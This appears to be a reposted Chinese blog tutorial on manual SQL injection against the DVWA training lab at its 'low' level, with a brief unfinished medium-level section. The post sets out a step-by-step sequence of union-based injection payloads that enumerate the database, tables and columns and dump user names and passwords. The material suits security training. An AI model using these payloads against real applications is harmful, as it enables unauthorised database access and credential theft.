首页 > 数据库技术 > 详细

DVWA-SQL注入-low

时间:2019-12-16 12:58:41      阅读:62      评论:0      收藏:0      [点我收藏+]

DVWA-SQL注入

一、SQL注入概念

  SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。

二、手工注入常规思路

1.判断是否存在注入

2.猜解SSQL查询语句中的字段数

3.确定回显位置

4.获取当前数据库

5.获取当前数据库中的表

6.获取表中的字段数

7.得到数据

三、DVWA注入分析

将DVWA级别设置为LOW

1.分析源码,可以看到没有对参数做任何过滤,直接带入数据库进行查询,分析sql查询语句,可能存在字符型sql注入。

技术分享图片

 

 

2.判断aql是否存在注入,以及注入的类型。 1’ and ’1’=’1

技术分享图片

 

 3.猜解SQL查询语句中的字数段数,

1‘ order by 1#

技术分享图片

 

 

 1‘ order by 2#

技术分享图片

 

 

 1‘ order by 3#

技术分享图片

 

 从上面的图可以说明,SQL语句查询的表的字段数是2.确定回显的位置(SQL语句查询之后的回显位置)

 

1‘ union select 1,2#      #下图可以看出有2个回显

技术分享图片

 

 

查询当前的数据库以及版本, 1‘ union select version(),database()#

技术分享图片

 

 

获取数据库中的表,1‘ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

技术分享图片

 

 

获取表中的字段名,1‘ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users‘#

技术分享图片

 

 

获得字段中的数据,1‘ union select user,password from users#

技术分享图片

 

 

 

中级DVWA进不去!!!!以下内容不用看

 

将DVWA的级别设置为Medium

中级加入了让一些防御,不让用户输入,只供选择(可以用burpsuit抓包来绕过),分析源码可以看到对参数使用masql_real_escape_string函数转义sql语句中的一些特殊字符,查看sql查询语句可以看出可能存在数字型sql注入。

通过burpsuit抓包,修改数据包,绕过防御。判断注入点以及注入类型,下图可以看到,存在注入,注入类型是数字型注入。 1 and 1=1#

DVWA-SQL注入-low

原文:https://www.cnblogs.com/amberhome-wei/p/12048339.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!